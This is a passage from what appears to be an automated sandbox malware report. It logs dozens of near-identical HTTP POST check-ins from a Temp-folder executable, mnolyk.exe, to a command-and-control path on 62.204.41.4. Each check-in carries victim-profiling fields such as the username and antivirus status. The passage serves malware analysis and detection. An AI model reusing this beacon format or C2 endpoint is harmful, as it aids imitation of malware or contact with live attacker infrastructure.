                                                        Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 30 39 33 39 35 34 26 75 6e 3d 61 6c 66 6f 6e 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                        Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=093954&un=user&dm=&av=13&lv=0&og=1
                                                        Feb 6, 2023 14:17:14.596820116 CET306INHTTP/1.1 200 OK
                                                        Server: nginx/1.18.0 (Ubuntu)
                                                        Date: Mon, 06 Feb 2023 13:17:14 GMT
                                                        Content-Type: text/html; charset=UTF-8
                                                        Transfer-Encoding: chunked
                                                        Connection: keep-alive
                                                        Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                        Data Ascii: 6<c><d>0


                                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                                        105192.168.2.54979562.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                        TimestampkBytes transferredDirectionData
                                                        Feb 6, 2023 14:17:14.968803883 CET306OUTPOST /Gol478Ns/index.php HTTP/1.1
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Host: 62.204.41.4
                                                        Content-Length: 88
                                                        Cache-Control: no-cache
                                                        Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 30 39 33 39 35 34 26 75 6e 3d 61 6c 66 6f 6e 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                        Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=093954&un=user&dm=&av=13&lv=0&og=1
                                                        Feb 6, 2023 14:17:15.033853054 CET307INHTTP/1.1 200 OK
                                                        Server: nginx/1.18.0 (Ubuntu)
                                                        Date: Mon, 06 Feb 2023 13:17:15 GMT
                                                        Content-Type: text/html; charset=UTF-8
                                                        Transfer-Encoding: chunked
                                                        Connection: keep-alive
                                                        Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                        Data Ascii: 6<c><d>0


                                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                                        106192.168.2.54979662.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                        TimestampkBytes transferredDirectionData
                                                        Feb 6, 2023 14:17:16.378789902 CET307OUTPOST /Gol478Ns/index.php HTTP/1.1
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Host: 62.204.41.4
                                                        Content-Length: 88
                                                        Cache-Control: no-cache
                                                        Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 30 39 33 39 35 34 26 75 6e 3d 61 6c 66 6f 6e 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                        Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=093954&un=user&dm=&av=13&lv=0&og=1
                                                        Feb 6, 2023 14:17:16.448314905 CET308INHTTP/1.1 200 OK
                                                        Server: nginx/1.18.0 (Ubuntu)
                                                        Date: Mon, 06 Feb 2023 13:17:16 GMT
                                                        Content-Type: text/html; charset=UTF-8
                                                        Transfer-Encoding: chunked
                                                        Connection: keep-alive
                                                        Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                        Data Ascii: 6<c><d>0


                                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                                        107192.168.2.54979762.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                        TimestampkBytes transferredDirectionData
                                                        Feb 6, 2023 14:17:16.911714077 CET308OUTPOST /Gol478Ns/index.php HTTP/1.1
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Host: 62.204.41.4
                                                        Content-Length: 88
                                                        Cache-Control: no-cache
                                                        Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 30 39 33 39 35 34 26 75 6e 3d 61 6c 66 6f 6e 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                        Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=093954&un=user&dm=&av=13&lv=0&og=1
                                                        Feb 6, 2023 14:17:16.977150917 CET309INHTTP/1.1 200 OK
                                                        Server: nginx/1.18.0 (Ubuntu)
                                                        Date: Mon, 06 Feb 2023 13:17:16 GMT
                                                        Content-Type: text/html; charset=UTF-8
                                                        Transfer-Encoding: chunked
                                                        Connection: keep-alive
                                                        Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                        Data Ascii: 6<c><d>0


                                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                                        108192.168.2.54979862.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                        TimestampkBytes transferredDirectionData
                                                        Feb 6, 2023 14:17:17.167239904 CET309OUTPOST /Gol478Ns/index.php HTTP/1.1
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Host: 62.204.41.4
                                                        Content-Length: 88
                                                        Cache-Control: no-cache
                                                        Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 30 39 33 39 35 34 26 75 6e 3d 61 6c 66 6f 6e 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                        Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=093954&un=user&dm=&av=13&lv=0&og=1
                                                        Feb 6, 2023 14:17:17.233485937 CET310INHTTP/1.1 200 OK
                                                        Server: nginx/1.18.0 (Ubuntu)
                                                        Date: Mon, 06 Feb 2023 13:17:17 GMT
                                                        Content-Type: text/html; charset=UTF-8
                                                        Transfer-Encoding: chunked
                                                        Connection: keep-alive
                                                        Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                        Data Ascii: 6<c><d>0


                                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                                        109192.168.2.54979962.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                        TimestampkBytes transferredDirectionData
                                                        Feb 6, 2023 14:17:17.417285919 CET310OUTPOST /Gol478Ns/index.php HTTP/1.1
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Host: 62.204.41.4
                                                        Content-Length: 88
                                                        Cache-Control: no-cache
                                                        Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 30 39 33 39 35 34 26 75 6e 3d 61 6c 66 6f 6e 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                        Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=093954&un=user&dm=&av=13&lv=0&og=1
                                                        Feb 6, 2023 14:17:17.481492043 CET311INHTTP/1.1 200 OK
                                                        Server: nginx/1.18.0 (Ubuntu)
                                                        Date: Mon, 06 Feb 2023 13:17:17 GMT
                                                        Content-Type: text/html; charset=UTF-8
                                                        Transfer-Encoding: chunked
                                                        Connection: keep-alive
                                                        Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                        Data Ascii: 6<c><d>0


                                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                                        11192.168.2.54970162.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                        TimestampkBytes transferredDirectionData
                                                        Feb 6, 2023 14:16:31.297622919 CET211OUTPOST /Gol478Ns/index.php HTTP/1.1
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Host: 62.204.41.4
                                                        Content-Length: 88
                                                        Cache-Control: no-cache
                                                        Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 30 39 33 39 35 34 26 75 6e 3d 61 6c 66 6f 6e 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                        Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=093954&un=user&dm=&av=13&lv=0&og=1
                                                        Feb 6, 2023 14:16:31.362792015 CET212INHTTP/1.1 200 OK
                                                        Server: nginx/1.18.0 (Ubuntu)
                                                        Date: Mon, 06 Feb 2023 13:16:31 GMT
                                                        Content-Type: text/html; charset=UTF-8
                                                        Transfer-Encoding: chunked
                                                        Connection: keep-alive
                                                        Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                        Data Ascii: 6<c><d>0


                                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                                        110192.168.2.54980062.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                        TimestampkBytes transferredDirectionData
                                                        Feb 6, 2023 14:17:17.654881954 CET311OUTPOST /Gol478Ns/index.php HTTP/1.1
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Host: 62.204.41.4
                                                        Content-Length: 88
                                                        Cache-Control: no-cache
                                                        Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 30 39 33 39 35 34 26 75 6e 3d 61 6c 66 6f 6e 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                        Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=093954&un=user&dm=&av=13&lv=0&og=1
                                                        Feb 6, 2023 14:17:17.718599081 CET312INHTTP/1.1 200 OK
                                                        Server: nginx/1.18.0 (Ubuntu)
                                                        Date: Mon, 06 Feb 2023 13:17:17 GMT
                                                        Content-Type: text/html; charset=UTF-8
                                                        Transfer-Encoding: chunked
                                                        Connection: keep-alive
                                                        Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                        Data Ascii: 6<c><d>0


                                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                                        111192.168.2.54980162.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                        TimestampkBytes transferredDirectionData
                                                        Feb 6, 2023 14:17:17.902349949 CET312OUTPOST /Gol478Ns/index.php HTTP/1.1
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Host: 62.204.41.4
                                                        Content-Length: 88
                                                        Cache-Control: no-cache
                                                        Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 30 39 33 39 35 34 26 75 6e 3d 61 6c 66 6f 6e 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                        Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=093954&un=user&dm=&av=13&lv=0&og=1
                                                        Feb 6, 2023 14:17:17.965825081 CET313INHTTP/1.1 200 OK
                                                        Server: nginx/1.18.0 (Ubuntu)
                                                        Date: Mon, 06 Feb 2023 13:17:17 GMT
                                                        Content-Type: text/html; charset=UTF-8
                                                        Transfer-Encoding: chunked
                                                        Connection: keep-alive
                                                        Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                        Data Ascii: 6<c><d>0


                                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                                        112192.168.2.54980262.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                        TimestampkBytes transferredDirectionData
                                                        Feb 6, 2023 14:17:18.144256115 CET313OUTPOST /Gol478Ns/index.php HTTP/1.1
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Host: 62.204.41.4
                                                        Content-Length: 88
                                                        Cache-Control: no-cache
                                                        Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 30 39 33 39 35 34 26 75 6e 3d 61 6c 66 6f 6e 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                        Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=093954&un=user&dm=&av=13&lv=0&og=1
                                                        Feb 6, 2023 14:17:18.215267897 CET314INHTTP/1.1 200 OK
                                                        Server: nginx/1.18.0 (Ubuntu)
                                                        Date: Mon, 06 Feb 2023 13:17:18 GMT
                                                        Content-Type: text/html; charset=UTF-8
                                                        Transfer-Encoding: chunked
                                                        Connection: keep-alive
                                                        Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                        Data Ascii: 6<c><d>0


                                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                                        113192.168.2.54980362.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                        TimestampkBytes transferredDirectionData
                                                        Feb 6, 2023 14:17:18.396344900 CET314OUTPOST /Gol478Ns/index.php HTTP/1.1
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Host: 62.204.41.4
                                                        Content-Length: 88
                                                        Cache-Control: no-cache
                                                        Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 30 39 33 39 35 34 26 75 6e 3d 61 6c 66 6f 6e 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                        Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=093954&un=user&dm=&av=13&lv=0&og=1
                                                        Feb 6, 2023 14:17:18.459352970 CET315INHTTP/1.1 200 OK
                                                        Server: nginx/1.18.0 (Ubuntu)
                                                        Date: Mon, 06 Feb 2023 13:17:18 GMT
                                                        Content-Type: text/html; charset=UTF-8
                                                        Transfer-Encoding: chunked
                                                        Connection: keep-alive
                                                        Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                        Data Ascii: 6<c><d>0


                                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                                        114192.168.2.54980462.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                        TimestampkBytes transferredDirectionData
                                                        Feb 6, 2023 14:17:18.644414902 CET315OUTPOST /Gol478Ns/index.php HTTP/1.1
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Host: 62.204.41.4
                                                        Content-Length: 88
                                                        Cache-Control: no-cache
                                                        Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 30 39 33 39 35 34 26 75 6e 3d 61 6c 66 6f 6e 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                        Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=093954&un=user&dm=&av=13&lv=0&og=1
                                                        Feb 6, 2023 14:17:18.708070993 CET316INHTTP/1.1 200 OK
                                                        Server: nginx/1.18.0 (Ubuntu)
                                                        Date: Mon, 06 Feb 2023 13:17:18 GMT
                                                        Content-Type: text/html; charset=UTF-8
                                                        Transfer-Encoding: chunked
                                                        Connection: keep-alive
                                                        Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                        Data Ascii: 6<c><d>0


                                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                                        115192.168.2.54980562.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                        TimestampkBytes transferredDirectionData
                                                        Feb 6, 2023 14:17:18.884453058 CET316OUTPOST /Gol478Ns/index.php HTTP/1.1
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Host: 62.204.41.4
                                                        Content-Length: 88
                                                        Cache-Control: no-cache
                                                        Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 30 39 33 39 35 34 26 75 6e 3d 61 6c 66 6f 6e 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                        Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=093954&un=user&dm=&av=13&lv=0&og=1
                                                        Feb 6, 2023 14:17:18.946724892 CET317INHTTP/1.1 200 OK
                                                        Server: nginx/1.18.0 (Ubuntu)
                                                        Date: Mon, 06 Feb 2023 13:17:18 GMT
                                                        Content-Type: text/html; charset=UTF-8
                                                        Transfer-Encoding: chunked
                                                        Connection: keep-alive
                                                        Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                        Data Ascii: 6<c><d>0


                                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                                        116192.168.2.54980662.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                        TimestampkBytes transferredDirectionData
                                                        Feb 6, 2023 14:17:19.119476080 CET317OUTPOST /Gol478Ns/index.php HTTP/1.1
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Host: 62.204.41.4
                                                        Content-Length: 88
                                                        Cache-Control: no-cache
                                                        Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 30 39 33 39 35 34 26 75 6e 3d 61 6c 66 6f 6e 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                        Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=093954&un=user&dm=&av=13&lv=0&og=1
                                                        Feb 6, 2023 14:17:19.188005924 CET318INHTTP/1.1 200 OK
                                                        Server: nginx/1.18.0 (Ubuntu)
                                                        Date: Mon, 06 Feb 2023 13:17:19 GMT
                                                        Content-Type: text/html; charset=UTF-8
                                                        Transfer-Encoding: chunked
                                                        Connection: keep-alive
                                                        Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                        Data Ascii: 6<c><d>0


                                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                                        117192.168.2.54980762.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                        TimestampkBytes transferredDirectionData
                                                        Feb 6, 2023 14:17:19.395600080 CET318OUTPOST /Gol478Ns/index.php HTTP/1.1
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Host: 62.204.41.4
                                                        Content-Length: 88
                                                        Cache-Control: no-cache
                                                        Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 30 39 33 39 35 34 26 75 6e 3d 61 6c 66 6f 6e 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                        Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=093954&un=user&dm=&av=13&lv=0&og=1
                                                        Feb 6, 2023 14:17:19.461359978 CET319INHTTP/1.1 200 OK
                                                        Server: nginx/1.18.0 (Ubuntu)
                                                        Date: Mon, 06 Feb 2023 13:17:19 GMT
                                                        Content-Type: text/html; charset=UTF-8
                                                        Transfer-Encoding: chunked
                                                        Connection: keep-alive
                                                        Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                        Data Ascii: 6<c><d>0


                                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                                        118192.168.2.54980862.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                        TimestampkBytes transferredDirectionData
                                                        Feb 6, 2023 14:17:19.636620998 CET319OUTPOST /Gol478Ns/index.php HTTP/1.1
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Host: 62.204.41.4
                                                        Content-Length: 88
                                                        Cache-Control: no-cache
                                                        Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 30 39 33 39 35 34 26 75 6e 3d 61 6c 66 6f 6e 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                        Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=093954&un=user&dm=&av=13&lv=0&og=1
                                                        Feb 6, 2023 14:17:19.700081110 CET320INHTTP/1.1 200 OK
                                                        Server: nginx/1.18.0 (Ubuntu)
                                                        Date: Mon, 06 Feb 2023 13:17:19 GMT
                                                        Content-Type: text/html; charset=UTF-8
                                                        Transfer-Encoding: chunked
                                                        Connection: keep-alive
                                                        Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                        Data Ascii: 6<c><d>0


                                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                                        119192.168.2.54980962.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                        TimestampkBytes transferredDirectionData
                                                        Feb 6, 2023 14:17:19.879292965 CET320OUTPOST /Gol478Ns/index.php HTTP/1.1
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Host: 62.204.41.4
                                                        Content-Length: 88
                                                        Cache-Control: no-cache
                                                        Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 30 39 33 39 35 34 26 75 6e 3d 61 6c 66 6f 6e 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                        Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=093954&un=user&dm=&av=13&lv=0&og=1
                                                        Feb 6, 2023 14:17:19.942990065 CET321INHTTP/1.1 200 OK
                                                        Server: nginx/1.18.0 (Ubuntu)
                                                        Date: Mon, 06 Feb 2023 13:17:19 GMT
                                                        Content-Type: text/html; charset=UTF-8
                                                        Transfer-Encoding: chunked
                                                        Connection: keep-alive
                                                        Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                        Data Ascii: 6<c><d>0


                                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                                        12192.168.2.54970262.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                        TimestampkBytes transferredDirectionData
                                                        Feb 6, 2023 14:16:31.544826984 CET212OUTPOST /Gol478Ns/index.php HTTP/1.1
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Host: 62.204.41.4
                                                        Content-Length: 88
                                                        Cache-Control: no-cache
                                                        Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 30 39 33 39 35 34 26 75 6e 3d 61 6c 66 6f 6e 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                        Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=093954&un=user&dm=&av=13&lv=0&og=1
                                                        Feb 6, 2023 14:16:31.609515905 CET213INHTTP/1.1 200 OK
                                                        Server: nginx/1.18.0 (Ubuntu)
                                                        Date: Mon, 06 Feb 2023 13:16:31 GMT
                                                        Content-Type: text/html; charset=UTF-8
                                                        Transfer-Encoding: chunked
                                                        Connection: keep-alive
                                                        Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                        Data Ascii: 6<c><d>0


                                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                                        120192.168.2.54981062.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                        TimestampkBytes transferredDirectionData
                                                        Feb 6, 2023 14:17:20.127758026 CET321OUTPOST /Gol478Ns/index.php HTTP/1.1
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Host: 62.204.41.4
                                                        Content-Length: 88
                                                        Cache-Control: no-cache
                                                        Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 30 39 33 39 35 34 26 75 6e 3d 61 6c 66 6f 6e 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                        Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=093954&un=user&dm=&av=13&lv=0&og=1
                                                        Feb 6, 2023 14:17:20.195579052 CET322INHTTP/1.1 200 OK
                                                        Server: nginx/1.18.0 (Ubuntu)
                                                        Date: Mon, 06 Feb 2023 13:17:20 GMT
                                                        Content-Type: text/html; charset=UTF-8
                                                        Transfer-Encoding: chunked
                                                        Connection: keep-alive
                                                        Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                        Data Ascii: 6<c><d>0


                                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                                        121192.168.2.54981162.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                        TimestampkBytes transferredDirectionData
                                                        Feb 6, 2023 14:17:20.370368958 CET322OUTPOST /Gol478Ns/index.php HTTP/1.1
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Host: 62.204.41.4
                                                        Content-Length: 88
                                                        Cache-Control: no-cache
                                                        Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 30 39 33 39 35 34 26 75 6e 3d 61 6c 66 6f 6e 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                        Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=093954&un=user&dm=&av=13&lv=0&og=1
                                                        Feb 6, 2023 14:17:20.433793068 CET323INHTTP/1.1 200 OK
                                                        Server: nginx/1.18.0 (Ubuntu)
                                                        Date: Mon, 06 Feb 2023 13:17:20 GMT
                                                        Content-Type: text/html; charset=UTF-8
                                                        Transfer-Encoding: chunked
                                                        Connection: keep-alive
                                                        Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                        Data Ascii: 6<c><d>0


                                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                                        122192.168.2.54981262.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                        TimestampkBytes transferredDirectionData
                                                        Feb 6, 2023 14:17:20.620291948 CET323OUTPOST /Gol478Ns/index.php HTTP/1.1
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Host: 62.204.41.4
                                                        Content-Length: 88
                                                        Cache-Control: no-cache
